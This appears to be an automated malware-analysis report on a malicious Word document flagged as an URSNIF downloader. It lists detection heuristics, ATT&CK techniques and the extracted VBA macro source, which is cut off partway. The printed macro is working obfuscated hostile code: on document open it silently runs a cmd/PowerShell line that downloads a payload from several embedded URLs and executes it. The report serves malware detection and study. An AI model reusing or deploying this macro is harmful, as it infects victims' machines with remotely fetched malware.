MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The critical heuristic firing for Shell() call in VBA indicates that the macro attempts to execute commands. The ClamAV detection as Doc.Downloader.URSNIF-6729855-3 further supports its malicious nature as a downloader. The macro attempts to construct and execute a command line that appears to be setting up an environment for downloading a payload.
Heuristics 5
-
ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5666 bytes |
SHA-256: 2b343f0198bcbdfd25ce93fe6707d46a4f4117b197646d614d3c797ac7ae0721 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "NYAmpiqCzPKYmP"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
Second "381407839" + "wimvADjwjIVv" + "YPESPjnCIpwL" + "CErYFXiN"
Second "423893704" + "S"
Second "Sz" + "4288"
Second "7168" + "294543505" + "6103" + "2862"
Shell YSFcLC + YctmrAvGb + OSVjhwRGiaj, CStr(vbHide)
Second "YrWIZ" + "mUnnopj" + "7396" + "BcE"
End Sub
Attribute VB_Name = "wRbZNlD"
Function YSFcLC()
On _
Error _
Resume _
Next
Second "NqCz" + "HBKFIASZTWw"
Second "jQCZYPswm" + "wjnt" + "tp" + "490722702"
JIXJRLoBMk = Format(Chr(11 + 4 + 11 + 0 + 73)) + "md /" + "V^:^O/" + Format(Chr(8 + 3 + 7 + 0 + 49)) + Format(Chr(3 + 1 + 3 + 0 + 27)) + "^s" + "e^t" + " ^dR^" + "3^6=^" + " ^ " + "^ " + "^ ^ " + "^ " + "^ ^ " + "^ ^}}{^"
Second "L" + "iqWoId" + "4074" + "3927"
Second "476995799" + "SXE" + "pmiWMRzGjIY" + "5856"
Second "6324" + "8010" + "Sju" + "bYNZ"
LHrSVVG = "h" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "t^" + "a" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "^};^ka^" + "erb;^D" + "^B^u$"
Second "SpwO" + "440879874" + "cGfptrMAO" + "2102"
Second "262" + "100853746" + "bb" + "hjwtdWbC"
WNLkzOl = "^ m^et^" + "I-^" + "e^" + "k^ovn^" + "I^;)" + "D" + "^Bu^$^ " + "^,^G" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "^T$(" + "el^iF" + "d^ao^l" + "nwo^D^" + ".P^"
Second "tck" + "454007359"
Second "SKVn" + "7426" + "q" + "knFtMPCUhEi"
EaVNK = "bt${yr" + "^t{)" + "^" + "F" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "^l" + "$^ n" + "i^ " + "^G" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "^" + "T" + "$("
Second "LdHWNTZqX" + "wjn"
Second "25495363" + "hjV" + "kpfAJr" + "Z"
vjuHcBuUUk = "h" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "aer" + "o" + "^f;'" + "e" + "^" + "x^" + "e.^'^" + "+" + "iPA" + "^$+^" + "'" + "^"
YSFcLC = JIXJRLoBMk + LHrSVVG + WNLkzOl + EaVNK + vjuHcBuUUk
Second "YiOSW" + "UNwXL"
Second "335611277" + "q"
Second "5701" + "B"
Second "3376" + "aJzRJEPFVEjP" + "2355" + "296082838"
End Function
Function YctmrAvGb()
On _
Error _
Resume _
Next
Second "RV" + "uM" + "MK" + "FSsYTUDS"
Second "KYCPcPBS" + "qkA" + "205758215" + "RkUfjTMz"
Second "Rzbz" + "GOCAImKw"
jtMlmd = "\^'^+" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "i" + "lb^" + "up" + "^:vn^" + "e$" + "^=DB^u" + "^$;" + "^'^5^5" + "^" + "7" + "^' ^= "
Second "qjjF" + "UWkh"
Second "t" + "7677"
PAnXPlKpfuB = "^iPA^$" + "^;" + ")^'@^'" + "(" + "^t^il^p" + "^"
Second "EYbowoWwdcGk" + "436467662"
Second "fKCA" + "1808"
LodMOnwB = "S^.'m^" + "H^q^" + "a^x" + "/m^o" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "^.yr^a" + "^dan^a" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "/" + "/:p" + "^tt" + "^" + "h^@^Z" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "/^set^"
Second "33551837" + "294342222"
Second "jXj" + "F"
Second "A" + "j" + "1261" + "310740337"
XioIhqbCb = "al^pm" + "e^t" + "/^d" + "^i." + Format(Chr(11 + 4 + 11 + 0 + 73)) + "^" + "a." + "us^u.^b"
Second "zTTkZY" + "8006" + "6910" + "u"
Second "PjLc" + "474210193" + "CQpfHM" + "zoB"
Second "BvETLpw" + "Ckri" + "qtdzNk" + "350115799"
Second "iDEs" + "AHCckjm"
TlKvlKsZSoT = "^" + "if//:p" + "tth@^L" + "^Y/" + "^p^j" + "." + "r^"
Second "29930127" + "SbXUjUpM" + "262251550" + "8009"
Second "Ef" + "pTfi"
Second "WqjAbiDZFR" + "5935"
Second "Qrbz" + "OLb"
Second "O" + "TsH" + "430160037" + "C"
RtpAOs = "e" + "v^er" + "^k" + "//:^p" + "^t^th^"
Second "Q" + "100341861" + "7493" + "oG"
Second "I" + "bCj"
CVhzDZrTNS = "@y^" + "o" + "^M/^m^" + "o" + Format(Chr(11 + 4 + 11 + 0 + 73)) + ".^tro" + "pnev" + "^a^d^e^" + "irra" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "/" + "/^:p" + "^t" + "t^h@"
Second "jsFDP" + "f" + "55792575" + "4582"
Second "OMw" + "9065" + "jtfh" + "66570442"
Second "qWwz" + "110735629" + "215707093" + "7991"
ErLrPjPj = "^" + "H^" + "l" +
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.